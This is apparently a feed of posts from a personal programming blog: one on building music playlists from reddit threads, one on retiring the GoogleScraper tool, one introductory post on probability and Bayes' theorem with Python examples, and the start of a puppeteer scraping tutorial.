<li>
<p>Marketing and business analysts need to know how, and through which keywords their sites are discovered. By creating many different keyword combinations and analyzing the results algorithmically, it's much easier to derive knowledge.</p>
</li>
<li>
<p>Business decisions often depend on data published in search engines. Scraping search engines makes a lot of sense in those cases.</p>
</li>
</ul>Programming to improve your life2019-01-02T22:38:00+01:002019-02-13T21:30:00+01:00Nikolai Tschachertag:incolumitas.com,2019-01-02:/2019/01/02/programming-to-improve-your-life/<p>Making use of programming skills</p><p><strong>In short</strong>: I am fed up with bad music and music apps and streaming platforms such as Spotify, Soundcloud or Youtube.
That's why I search for objectively good music playlists on the Internet, download the songs from Youtube and then don't have to care about music supply for a couple of years.
My main issue with existing music platforms: Any algorithm giving me suggestions based on my past music taste doesn't factor in that I might in fact have a bad music taste.</p>
<p>I have been programming for almost 10 years now. I have almost finished my M. Sc. in computer science. I developed many projects in a wide range of programming languages
in the past years, many projects which I abandoned early, too many blog posts that were never completed.
So much buggy code, too many bad choices.</p>
<p>To be honest, I don't think I ever created a piece of software that I was truly satisfied with. I have come to terms with the fact that I am an average
programmer trying to make a living with it.</p>
<p>About three years ago, I caught myself listening to the same few songs again and again that I had saved on my smartphone.
Even though I would consider myself savvy in many areas of information technology, streaming platforms like Spotify
or Soundcloud never managed to convince me.</p>
<p>Therefore, my usual approach was to download some songs from youtube that I already knew. I saved them to my phone and listened
to them until I couldn't stand them anymore. Once in a while, I found fresh artists on youtube and I added them to my small
collection of music.</p>
<p>I tried the free version of spotify, but the advertisements were too annoying for me. Furthermore, I couldn't imagine spending 10$ a month
for their service. Why bother paying for music when you can have it for free on youtube?</p>
<p>To be honest, not wanting to pay 10$ is a bad argument, since I pay much more money for many other useless services
(such as my amazon prime account, which I almost never use).</p>
<p>Nevertheless, something inside me wants to remain independent and free. I don't want to become enslaved by spotify and provide them with my valuable user data.
I don't want to give them money for such a mediocre business idea. So what is the alternative?</p>
<p>I heard there is also <a href="https://music.youtube.com/">youtube music</a> now. Basically a version of youtube that is focused on music videos.
I briefly tried it out, and it let me choose the artists and songs that I was already aware of.</p>
<p>That's not what I want. I want music that I don't know yet and that many people collectively like. <strong>Any algorithm giving me suggestions
based on my past music taste doesn't factor in that I might in fact have a bad music taste.</strong></p>
<h3>Love for the Unknown</h3>
<p>I want to find quality music I am not aware of yet. To summarize, my goals are the following:</p>
<ul>
<li>I don't want to be dependent on an active internet connection. More often than not, I reach my monthly data limit on my smartphone
and can't listen to good music anymore. Further reasons: flights or foreign countries with roaming fees.</li>
<li>I don't want to subscribe to a music service such as Spotify or Youtube Music. I dislike downloading apps and giving away user data.</li>
<li>Advertisements are from hell and completely neutralise any happiness that stems from listening to cool songs. Therefore, I
must avoid free spotify or youtube music.</li>
<li>I like to own the actual MP3 files.</li>
</ul>
<p>So what do I need to do? </p>
<ol>
<li>I need to identify objective, reliable sources of <strong>what good music is</strong>.</li>
<li>I need to compile a list of the songs.</li>
<li>I need to program a script that searches for the titles on youtube and downloads them.</li>
</ol>
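<p>The second and third step could start out like the sketch below. It assumes that the comments have already been collected as pairs of text and upvotes (the sample data is invented) and that people write songs as "Artist - Title". The names <code>rank_songs</code> and <code>youtube_search_url</code> are made up, and the actual download is deliberately left out.</p>

```python
import re
from collections import defaultdict
from urllib.parse import quote_plus

# Matches comments of the form "Artist - Title" (no hyphens inside names).
SONG_PATTERN = re.compile(
    r"^\s*(?P<artist>[^-\n]+?)\s+-\s+(?P<title>[^-\n]+?)\s*$"
)


def rank_songs(comments):
    """Sum upvotes per (artist, title) and sort by total, highest first."""
    scores = defaultdict(int)
    for text, upvotes in comments:
        match = SONG_PATTERN.match(text)
        if match is None:
            continue  # not a song suggestion in the expected format
        key = (match["artist"].lower(), match["title"].lower())
        scores[key] += upvotes
    return sorted(scores.items(), key=lambda item: item[1], reverse=True)


def youtube_search_url(artist, title):
    """Build a youtube search URL for a song."""
    query = quote_plus(f"{artist} {title}")
    return "https://www.youtube.com/results?search_query=" + query


# Invented sample data standing in for scraped reddit comments.
comments = [
    ("Pink Floyd - Echoes", 120),
    ("pink floyd - echoes", 30),
    ("Great thread!", 500),
    ("Nick Drake - Pink Moon", 90),
]
for (artist, title), score in rank_songs(comments):
    print(score, youtube_search_url(artist, title))
```

<p>The pattern is intentionally strict, so artists with a hyphen in their name are missed; for a one-off playlist that seemed an acceptable trade-off to me compared to parsing free text.</p>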
<h3>Finding sources</h3>
<p>Have you tried browsing youtube for music? The algorithm is broken. It just doesn't work. It's not smarter than the user. And the
user doesn't know what constitutes good music. <em>That's why he is searching</em>.</p>
<p>Because many people are much smarter and more experienced than me, let's ask them what they consider to be good music.</p>
<p>The more people commented, the better the playlist will be. For example <a href="https://www.reddit.com/r/AskReddit/comments/5rsyjw/what_song_is_a_1010_yet_hardly_anybody_has_heard/">this reddit thread</a>
from 2017 is pure gold. 7100 comments and people <a href="https://play.google.com/music/preview/pl/AMaBXykqYrojBN3OnyGTPB5kiST-yZrtALFcPLtU3CTtRawBcb2kNNd9-rvIkR781-EICggcECLAOCdEsoNsSz4e-0ZgdNdUTQ==">even made a playlist</a> from the top comments. This saves some work.</p>
<h4>Approach: Search past reddit threads of the form "What is your favourite song?"</h4>
<p>A good idea is to search the internet for recent (in the past two years) threads where people name their favourite songs.</p>
<ul>
<li>https://www.reddit.com/r/AskReddit/comments/5rsyjw/what_song_is_a_1010_yet_hardly_anybody_has_heard/</li>
<li>https://www.reddit.com/r/AskReddit/comments/6iqvmw/what_is_your_favorite_song/</li>
<li>https://www.reddit.com/r/AskReddit/comments/2akyrk/what_is_your_favourite_song_of_all_time/</li>
<li>https://www.reddit.com/r/AskReddit/comments/16jtpa/what_is_the_most_beautiful_song_youve_ever_heard/ Old but still relevant</li>
<li>https://www.reddit.com/r/SpotifyPlaylists/top/?t=all</li>
</ul>
<p>And I searched especially for classical music because I am a huge noob in this part of music:</p>
<ul>
<li>https://www.reddit.com/r/AskReddit/comments/1gea1e/what_are_the_most_beautiful_pieces_of_classical/</li>
<li>https://www.reddit.com/r/AskReddit/comments/1oppdn/whats_your_favorite_piece_of_classical_music_why/</li>
<li>https://www.reddit.com/r/classicalresources/comments/13mteq/a_playlist_of_20_great_classical_works_for/</li>
<li>https://open.spotify.com/playlist/4bAquhPmrdqGpfHWLwhloh</li>
<li>https://www.reddit.com/r/classicalmusic/comments/85vsnq/most_moving_classical_pieces/</li>
</ul>
<p>And then I also searched for all kinds of electronic music, house music, EDM, techno and so on:</p>
<ul>
<li>https://www.reddit.com/r/EDM/comments/7abjf8/what_is_your_favorite_edm_song_of_all_time/</li>
<li>https://www.reddit.com/r/Techno/comments/20yce8/best_feel_good_techno_song_of_all_time/</li>
</ul>
<p>Then I searched for threads where people name songs that <em>everyone knows but can't put a name to</em>.</p>
<ul>
<li>https://www.reddit.com/r/AskReddit/comments/848sz0/whats_a_1010_song_that_not_many_people_know_about/</li>
<li>https://www.reddit.com/r/AskReddit/comments/5rsyjw/what_song_is_a_1010_yet_hardly_anybody_has_heard/</li>
</ul>
<h4>Compile a meta list from existing playlists</h4>
<ul>
<li>https://www.reddit.com/r/Music/comments/8lhw1o/i_made_a_spotify_playlist_of_the_best_songs_ever/</li>
<li>https://open.spotify.com/playlist/6uYt5DwcyaOxxPUundboC2?si=RJn2frzTRwOVAKRJFWyZxA</li>
<li>https://open.spotify.com/playlist/1cAHI20k456593GCBNqzw6</li>
<li>https://www.reddit.com/r/Music/comments/79mpf3/i_made_a_spotify_playlist_from_the_reddit/</li>
<li>https://open.spotify.com/playlist/79dEZteWKyQJTOyURURnyX</li>
<li>
<p>https://open.spotify.com/playlist/7CseXkRUYWMS6jm0VafGlN?si=ifApvK9MSneaiDSLUj7NpQ</p>
</li>
<li>
<p>Collaborative: https://open.spotify.com/user/haeltotoe/playlist/62SJFBkvpmR0Z6MIa9v13I?si=zteIfdJ9RbW0g6rIxNr3FA</p>
</li>
</ul>
<h4>Existing Google Play Lists: https://play.google.com</h4>
<ul>
<li>https://play.google.com/music/preview/pl/AMaBXynbKSugHYaAeEOzFdDN1RXRtgQ99Bn6aUkTDEbmn3mEQ0rGmGYjBJuN5fGhDYefF1-O-iItTfzrHJ35DQiI8_R4J6bnfQ==</li>
</ul>
<h4>Use Github as a data source</h4>
<p>For example <a href="https://github.com/angrbrd/top5000-playlist/blob/master/TopSongs.csv">this javascript application</a> features a list of 5000 top songs mostly from the United States. The most recent songs date back to 2013.
I won't use this list because there are too many generic pop songs in it.</p>
<p>This <a href="https://gist.github.com/manios/4515112">personal gist</a> of a github user named manios is much better in my opinion, because the list directly includes Youtube links.
However, it is too opinionated.</p>
<h3>The End Result</h3>
<p>Of course, I needed to base my list on upvotes from reddit or trust random people from spotify.</p>Discontinuation of GoogleScraper2018-12-24T18:00:00+01:002018-12-24T18:00:00+01:00Nikolai Tschachertag:incolumitas.com,2018-12-24:/2018/12/24/discontinuation-googlescraper/<p>Discontinuation of GoogleScraper in favor of https://www.npmjs.com/package/se-scraper</p><p>In this blog post I am going to briefly outline the reasons why I decided to stop
developing the GoogleScraper Python3 module.</p>
<ol>
<li>Python is not the language/framework for modern scraping. Node/Javascript is. The reason is puppeteer. puppeteer is the de-facto standard for controlling and automating web browsers (especially Chrome). GoogleScraper, however, uses Selenium. Selenium is kind of old and outdated.</li>
<li>Scraping in 2019 is almost completely reduced to controlling web browsers. There is no longer any need to scrape directly on the HTTP protocol level. It's too buggy and too easily detected by anti-bot mechanisms. And GoogleScraper still supports raw HTTP requests.</li>
<li>Scraping should be parallelized in the cloud or among a set of dedicated machines. GoogleScraper cannot handle such use cases without significant effort.</li>
<li>GoogleScraper's architecture is too complicated. Additionally, the code base is too buggy and long scraping jobs are notoriously unreliable.</li>
</ol>
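<p>The third point, spreading a scrape job over several workers, boils down to splitting the keyword list into batches. The following sketch uses threads on one machine as a stand-in for separate machines; <code>scrape_batch</code> is a placeholder that does no real scraping, and all names are invented for this example.</p>

```python
from concurrent.futures import ThreadPoolExecutor


def chunk(items, size):
    """Yield consecutive batches of at most `size` items."""
    if size < 1:
        raise ValueError("size must be at least 1")
    for start in range(0, len(items), size):
        yield items[start:start + size]


def scrape_batch(keywords):
    """Placeholder worker: a real one would drive a browser per keyword."""
    return {keyword: f"results for {keyword}" for keyword in keywords}


def run_parallel(keywords, batch_size=2, workers=4):
    """Distribute keyword batches over a pool of workers and merge results."""
    batches = list(chunk(list(keywords), batch_size))
    results = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for partial in pool.map(scrape_batch, batches):
            results.update(partial)
    return results


print(run_parallel(["a", "b", "c", "d", "e"]))
```

<p>In a cloud setup, each batch would be sent to a different machine instead of a thread, but the splitting and merging logic stays the same.</p>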
<h2>https://www.npmjs.com/package/se-scraper</h2>
<p>Instead I will maintain a small node library based on puppeteer that scrapes a range of popular search engines.</p>
<p>This project will never become complicated and will instead focus on small scrape jobs. If you want to scrape a
large number of keywords, you can pay to do so on <a href="https://scrapeulous.com/">scrapeulous.com</a> or you can hire me directly as a programmer.</p>
<p>For simple use cases, https://www.npmjs.com/package/se-scraper is more than enough.</p>
<p>For this node module I will focus on keeping up to date with html changes of the search engines and will guarantee that basic scraping functionality is working. Large features won't be implemented however.</p>Introduction to Machine Learning in 20192018-11-18T15:37:00+01:002018-11-18T15:37:00+01:00Nikolai Tschachertag:incolumitas.com,2018-11-18:/2018/11/18/introduction-machine-learning-2019/<p>Gentle Introduction into machine learning in 2019</p><h2>Introduction to machine learning</h2>
<p>This is the beginning of a blog post series that dives into the art of machine learning.</p>
<p>In the past months, I worked a lot with data and I learned that I need to understand the algorithms and problem solving strategies that modern machine learning brings along. To teach myself those concepts, I will
create a series of blog posts that cover the fundamentals and some advanced algorithms in machine learning.</p>
<p>The general approach of this blog post series is breadth first, with the occasional in-depth analysis of an interesting algorithm. I try to understand the concepts intuitively, and I will select a few illustrative problems to introduce algorithms and code.</p>
<p>This is the first blog post of this series and will cover <strong>an introduction to machine learning</strong> as well as
the <strong>statistical basics</strong> of machine learning. I will mostly work with <strong>Python3</strong> and the <strong>Anaconda Python</strong> distribution, since I am familiar with those tools.</p>
<p>This introduction will cover the following topics:</p>
<ol>
<li>Some relevant stuff from probability theory and statistics as mathematical background</li>
<li>Basic algorithms in machine learning such as Bayes and K-Means algorithm</li>
</ol>
<h2>Typical problems that machine learning aims to solve</h2>
<ul>
<li>Machine learning is heavily used in search engine ranking. Algorithms learn from a wide range of parameters which search results are most likely requested by which kind of user.</li>
<li>Translation of texts between two languages. One approach to translating a text into another language would be to crawl all pages that have multilingual support and learn how to translate any text based on this sample set.</li>
<li>Another example would be the classification of faces in images to a label such as the person's name. This is what Facebook and Instagram do with the images the user uploaded.</li>
<li>Further well known examples are speech recognition and handwriting recognition. The aim in those tasks is to translate audio recordings to text and to translate images of handwriting to text.</li>
</ul>
<p>A special problem that is of major interest for me is the following:</p>
<p>I want to <strong>recognize news articles</strong> solely based on one input: a link to the document. The algorithm should automatically recognize whether the link points to a news article and should be able to identify the relevant pieces of information that constitute a news article:</p>
<ul>
<li>A heading</li>
<li>A publication date</li>
<li>Optionally an author name</li>
<li>Optionally a short description</li>
<li>The article itself</li>
</ul>
<h2>Problem Sets</h2>
<p>A problem falls within <strong>Binary Classification</strong> when our algorithm needs to make a statement whether a value falls in class zero or class one. For example when our machine learning algorithm makes a statement whether a credit card purchase is fraudulent or not, it makes a binary classification.</p>
<p><strong>Multiclass Classification</strong> is the extension of <strong>Binary Classification</strong>. The target random variable <span class="math">\(y \in \{1, \dots, n\}\)</span> can now assume a range of different values. For example, we want to classify patient data sets into different levels of health risk based on a range of input factors (very healthy, healthy, ill, terminally ill).</p>
<p><strong>Regression</strong> estimates a continuous value, for example the future value of a stock, the yield of a business based on past income data, or any data point that follows an assumed regression function.</p>
<p><strong>Novelty Detection</strong> is a set of problems that search for a metric to detect novel data based on known data from the past.</p>
<h2>Some probability theory</h2>
<p>I assume that the reader has general knowledge of what a random variable is (for example the roll of a die).</p>
<p>In general, a random variable maps the outcome of a random experiment to a result (for example a number). A coin toss, for example, has two different outcomes, heads and tails. Thus this random variable <span class="math">\(X\)</span> maps the coin toss into the set <span class="math">\(\{\text{heads}, \text{tails}\}\)</span>.</p>
<p>A random variable can be discrete (coin toss, two outcomes) or continuous (height of a person, infinitely many possible values).</p>
<p>Another important concept is that of <strong>distributions</strong>. A distribution describes how likely each value of a random variable is. For a continuous random variable it is given by a probability density function (PDF), which always integrates to one.</p>
<p>Two very important and well-known distributions are the <strong>uniform distribution</strong> and the <strong>normal distribution</strong>. The uniform distribution assigns the same probability density to every <span class="math">\(x\)</span> in an interval <span class="math">\([a,b]\)</span>. The formula for the uniform distribution is:
</p>
<div class="math">$$
U(X=x)=
\begin{cases}
\frac{1}{b-a}, \quad \text{if } x \in [a,b]\\
0, \quad \text{otherwise}\\
\end{cases}
$$</div>
<p>and the formula for the normal or <strong>Gaussian distribution</strong> is:</p>
<div class="math">$$
N(X=x)= \frac{1}{\sqrt{2\pi\sigma^2}}\exp{\big(-\frac{(x-\mu)^2}{2\sigma^2}\big)}
$$</div>
<p>where <span class="math">\(\sigma^2\)</span> is the variance (<span class="math">\(\sigma\)</span> is the standard deviation) and <span class="math">\(\mu\)</span> is the center/mean of the distribution.</p>
<p><img alt="Uniform and Normal Distribution" src="https://incolumitas.com/images/ml-figure1.png"></p>
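<p>As a minimal sketch, both density functions can be written down directly in Python and checked numerically. The helper names <code>uniform_pdf</code>, <code>normal_pdf</code> and <code>integrate</code> are my own choice for this illustration, and <code>sigma</code> denotes the standard deviation, so that <code>sigma ** 2</code> is the variance that appears in the formula. The simple midpoint rule is only an approximation, but it is good enough to see that both densities integrate to roughly one.</p>

```python
import math


def uniform_pdf(x, a, b):
    """Density of the uniform distribution on the interval [a, b]."""
    return 1.0 / (b - a) if a <= x <= b else 0.0


def normal_pdf(x, mu, sigma):
    """Density of the normal distribution; sigma is the standard deviation."""
    variance = sigma ** 2
    return math.exp(-((x - mu) ** 2) / (2 * variance)) / math.sqrt(2 * math.pi * variance)


def integrate(f, lo, hi, steps=10_000):
    """Approximate the integral of f over [lo, hi] with the midpoint rule."""
    width = (hi - lo) / steps
    return sum(f(lo + (i + 0.5) * width) for i in range(steps)) * width


# Both areas should be close to 1.0 (the interval bounds are arbitrary examples).
uniform_area = integrate(lambda x: uniform_pdf(x, 2.0, 5.0), 0.0, 10.0)
normal_area = integrate(lambda x: normal_pdf(x, 0.0, 1.0), -10.0, 10.0)
print(round(uniform_area, 3), round(normal_area, 3))
```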
<p>Another important concept is the <strong>cumulative distribution function (CDF)</strong> <span class="math">\(F\)</span> of a probability distribution, where <span class="math">\(F(x) = P(X \leq x)\)</span>. Integrating the density <span class="math">\(p\)</span> over an interval <span class="math">\([a,b]\)</span> gives the probability that <span class="math">\(X\)</span> falls into this interval, so range queries can be answered with the CDF:</p>
<div class="math">$$
P(a \leq X \leq b) = \int_a^b p(x)\,dx = F(b) - F(a)
$$</div>
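<p>A range query of this kind can be sketched in a few lines of Python. The function names are hypothetical; the normal CDF is expressed through the error function <code>math.erf</code> from the standard library, and the intervals are arbitrary examples.</p>

```python
import math


def normal_cdf(x, mu=0.0, sigma=1.0):
    """CDF of the normal distribution, expressed through the error function."""
    return 0.5 * (1.0 + math.erf((x - mu) / (sigma * math.sqrt(2.0))))


def uniform_cdf(x, a, b):
    """CDF of the uniform distribution on [a, b], clamped to [0, 1]."""
    return min(1.0, max(0.0, (x - a) / (b - a)))


def range_probability(cdf, a, b):
    """P(a <= X <= b) computed as F(b) - F(a)."""
    return cdf(b) - cdf(a)


# Probability that a standard normal variable lies within one standard deviation.
within_one_sigma = range_probability(normal_cdf, -1.0, 1.0)
# Probability that a uniform variable on [0, 10] lies in [2, 5].
uniform_part = range_probability(lambda x: uniform_cdf(x, 0.0, 10.0), 2.0, 5.0)

print(round(within_one_sigma, 4))  # 0.6827
print(round(uniform_part, 4))
```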
<p>The <strong>mean</strong> or <strong>expected value</strong> of a random variable, for example of throwing a fair die, is <span class="math">\((1+2+3+4+5+6)/6=3.5\)</span>.</p>
<p>Then there are measures of dispersion for random variables. The <strong>variance</strong> of a random variable is the mean of the squared difference between the realisations of the random variable and its mean. Therefore the variance of the die example from above is
</p>
<div class="math">$$
Var(X) = ((1-3.5)^2 + (2-3.5)^2 + (3-3.5)^2 + (4-3.5)^2 + (5-3.5)^2 + (6-3.5)^2)/6 \approx 2.9
$$</div>
<p>The variance quantifies how much the random variable varies around the mean of the distribution. The <strong>standard deviation</strong> is the square root of the variance.</p>
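<p>The die example can be reproduced with a short Python sketch. It assumes a fair six-sided die and uses exact fractions, so the mean and the variance come out without rounding errors; the variable names are only illustrative.</p>

```python
import math
from fractions import Fraction

faces = [1, 2, 3, 4, 5, 6]
prob = Fraction(1, 6)  # every face of a fair die is equally likely

# Expected value: probability-weighted sum of all outcomes.
mean = sum(prob * x for x in faces)
# Variance: probability-weighted squared distance from the mean.
variance = sum(prob * (x - mean) ** 2 for x in faces)
# Standard deviation: square root of the variance.
std_dev = math.sqrt(variance)

print(mean, variance, round(std_dev, 3))  # 7/2 35/12 1.708
```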
<p>When we look at two random variables <span class="math">\(X\)</span> and <span class="math">\(Y\)</span>, we can speak of dependent and independent random variables. Two random variables are independent when, for all values <span class="math">\(x\)</span> and <span class="math">\(y\)</span>,
</p>
<div class="math">$$P(X=x, Y=y)=P(X=x)P(Y=y)$$</div>
<p>
If this is not the case, they are said to be dependent. Height and weight are usually dependent random variables. Gender and height are also dependent random variables. Hair color and height, however, can be regarded as independent of each other.</p>
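<p>For discrete random variables, the independence condition can be checked by brute force. The following sketch uses two fair dice instead of height and weight, which is my own choice of example: the two individual rolls are independent, while the first roll and the sum of both rolls are not. All function names are hypothetical.</p>

```python
from fractions import Fraction
from itertools import product

# All 36 equally likely outcomes of rolling two fair dice.
outcomes = list(product(range(1, 7), repeat=2))
p_outcome = Fraction(1, len(outcomes))


def first(outcome):
    return outcome[0]


def second(outcome):
    return outcome[1]


def total(outcome):
    return outcome[0] + outcome[1]


def independent(f, g):
    """Check P(X=x, Y=y) == P(X=x) * P(Y=y) for all value pairs of X=f, Y=g."""
    joint, px, py = {}, {}, {}
    for o in outcomes:
        x, y = f(o), g(o)
        joint[(x, y)] = joint.get((x, y), 0) + p_outcome
        px[x] = px.get(x, 0) + p_outcome
        py[y] = py.get(y, 0) + p_outcome
    return all(joint.get((x, y), 0) == px[x] * py[y] for x in px for y in py)


print(independent(first, second))  # True
print(independent(first, total))   # False
```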
<p>We speak of independent and identically distributed (i.i.d.) random variables when the random variables of a series <span class="math">\((X_n)_{n \in \mathbb{N}}\)</span> are all independent of each other and all have the same probability distribution.</p>
<p>When we know that two random variables are dependent on each other, we are interested in the <strong>conditional probability</strong>. For example, what is the conditional probability that a person has a height of 1.88m when we know that this person weighs 70kg, <span class="math">\(P(Height=1.88m \mid Weight=70kg)\)</span>? This conditional probability is most likely lower than the conditional probability <span class="math">\(P(Height=1.88m \mid Weight=80kg)\)</span>.</p>
<p>Conditional probability can be formally written as <span class="math">\(p(x|y) = \frac{p(x,y)}{p(y)}\)</span>, provided that <span class="math">\(p(y) > 0\)</span>.</p>
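<p>To make the definition concrete, here is a small sketch that derives conditional probabilities from a joint distribution. The joint table is entirely made up for illustration (two height classes and two weight classes); only the formula itself comes from the text.</p>

```python
# Hypothetical joint distribution p(height, weight); the numbers are invented
# for illustration and sum to one.
joint = {
    ("tall", "heavy"): 0.30,
    ("tall", "light"): 0.10,
    ("short", "heavy"): 0.15,
    ("short", "light"): 0.45,
}


def marginal_weight(weight):
    """p(weight): sum the joint probabilities over all heights."""
    return sum(p for (_, w), p in joint.items() if w == weight)


def conditional(height, weight):
    """p(height | weight) = p(height, weight) / p(weight)."""
    return joint[(height, weight)] / marginal_weight(weight)


p_tall_given_heavy = conditional("tall", "heavy")
p_tall_given_light = conditional("tall", "light")
print(round(p_tall_given_heavy, 3), round(p_tall_given_light, 3))
```

<p>In this made-up table, being tall is much more likely for a heavy person than for a light one, which mirrors the height and weight example.</p>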
<h2>Bayes Theorem</h2>
<p>Let <span class="math">\(X\)</span> and <span class="math">\(Y\)</span> be random variables. Then the following equation is known as Bayes' theorem:</p>
<div class="math">$$
p(y|x)=\frac{p(x|y)p(y)}{p(x)}
$$</div>
<p>This follows from the following equality:</p>
<div class="math">$$
p(x,y) = p(x|y)p(y) = p(y|x)p(x)
$$</div>
<h4>Example for Bayes Theorem</h4>
<p>Because <strong>Bayes' theorem</strong> is of such importance, it makes sense to introduce an example in order to get
an intuitive understanding of the theorem.</p>
<p>Let's suppose we have a medical test that enables us to test whether a patient has yellow fever.
When a patient is infected with yellow fever, the test always yields a positive result.
On the other hand, the test has an error rate of 2% for healthy patients. Let X be the random variable that tracks the health status of the patient and let T be the random variable that holds the result of the test. So far we know that <span class="math">\(P(T=\text{positive}|X=\text{infected})=1.0\)</span>, <span class="math">\(P(T=\text{positive}|X=\text{healthy})=0.02\)</span> and <span class="math">\(P(T=\text{negative}|X=\text{healthy})=0.98\)</span>.</p>
<p>Let's assume that <span class="math">\(0.05\%\)</span> of the whole population is infected with yellow fever in a country like Colombia. We are interested in the probability that the patient is infected with yellow fever under the condition that the test is positive. Formally we are looking for the solution of
</p>
<div class="math">$$
p(X=\text{infected}|T=\text{positive}) = \frac{p(T=\text{positive}|X=\text{infected})p(X=\text{infected})}{p(T=\text{positive})}
$$</div>
<p>The only term in the equation we don't know is <span class="math">\(p(T=\text{positive})\)</span>. We can compute it by summing over all possible cases:
</p>
<div class="math">$$
p(T=\text{positive}) = p(T=\text{positive}, X=\text{infected}) + p(T=\text{positive}, X=\text{healthy}) =\\ p(T=\text{positive}|X=\text{infected})p(X=\text{infected}) + p(T=\text{positive}|X=\text{healthy})p(X=\text{healthy}) =\\ 1.0\cdot0.0005 + 0.02 \cdot 0.9995 \approx\\ 0.0205
$$</div>
<p>We can now compute the probability as <span class="math">\(p(X=\text{infected}|T=\text{positive})= \frac{1.0 \cdot 0.0005}{0.0205} \approx 0.024\)</span>.</p>
<p>This result is quite astonishing. Even though the test has only a 2% error rate, a patient with a positive test result is actually infected with a probability of only about <strong>2.4%</strong>. The reason is that the infection is so rare that the false positives among the many healthy patients far outnumber the true positives.</p>
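<p>The posterior depends strongly on the false-positive rate of the test, so it is worth recomputing it for different rates. The following Python sketch applies Bayes' theorem to the numbers of the example; the function name <code>posterior</code> and its parameter names are my own. A false-positive rate of 0.02 gives a posterior of roughly 0.024, while a rate of 0.002 gives roughly 0.2.</p>

```python
def posterior(prior, sensitivity, false_positive_rate):
    """p(infected | positive) via Bayes' theorem.

    prior:               p(infected)
    sensitivity:         p(positive | infected)
    false_positive_rate: p(positive | healthy)
    """
    # p(positive), obtained by summing over both health states.
    evidence = sensitivity * prior + false_positive_rate * (1.0 - prior)
    return sensitivity * prior / evidence


prior = 0.0005  # 0.05% of the population is infected

with_rate_2_percent = posterior(prior, 1.0, 0.02)
with_rate_02_percent = posterior(prior, 1.0, 0.002)
print(round(with_rate_2_percent, 4), round(with_rate_02_percent, 4))
```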
<p>So how can we improve the diagnosis and make the test better?</p>
<p>We could take more information into account, such as the age or gender of the person to be tested.
For example, if we fix the age at 22 years, then <span class="math">\(p(X=\text{infected}|Age=22) = 0.001\%\)</span> is much lower than the probability that a person of any age is infected (0.05%).</p>
<p>This combination of evidence is a <strong>very powerful approach</strong>.</p>
<p>We could also repeat measurements with two independent tests <span class="math">\(T_1\)</span> and <span class="math">\(T_2\)</span> and then the conditional probability from above will be much higher than before:</p>
<div class="math">$$
p(X=\text{infected}|T_1=\text{positive},T_2=\text{positive})
$$</div>
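<p>How much a second test helps can be estimated with a short sketch. It assumes that both tests are conditionally independent given the health status and that both have the same characteristics (always positive for infected patients, 2% false positives for healthy patients); these are assumptions made for illustration. Under them, the posterior after the first positive test simply becomes the prior for the second one.</p>

```python
def update(prior, sensitivity, false_positive_rate):
    """One Bayesian update of p(infected) after a positive test result."""
    evidence = sensitivity * prior + false_positive_rate * (1.0 - prior)
    return sensitivity * prior / evidence


prior = 0.0005  # p(infected) before any test

# Assumption: both tests behave identically and are conditionally
# independent given the true health status.
after_first = update(prior, 1.0, 0.02)
after_second = update(after_first, 1.0, 0.02)

print(round(after_first, 4), round(after_second, 4))
```

<p>With these assumed numbers, the probability of an infection rises from roughly 2.4% after one positive test to roughly 56% after two positive tests.</p>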
<h2>Basic Algorithms</h2>
<p>A very good overview of basic machine learning algorithms classified by problem domain can be <a href="https://machinelearningmastery.com/a-tour-of-machine-learning-algorithms/">found here</a>.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Tutorial: Youtube scraping with puppeteer2018-10-29T13:58:00+01:002018-10-29T13:58:00+01:00Nikolai Tschachertag:incolumitas.com,2018-10-29:/2018/10/29/youtube-puppeteer-scraping/<p>How to scrape youtube videos using puppeteer</p><p>In this blog post I am going to show you how to scrape YouTube video data using the handy puppeteer library. Puppeteer is a Node library
which uses the DevTools Protocol to control Chrome (or any other browser that implements the DevTools Protocol).</p>
<h3>Quickstart</h3>
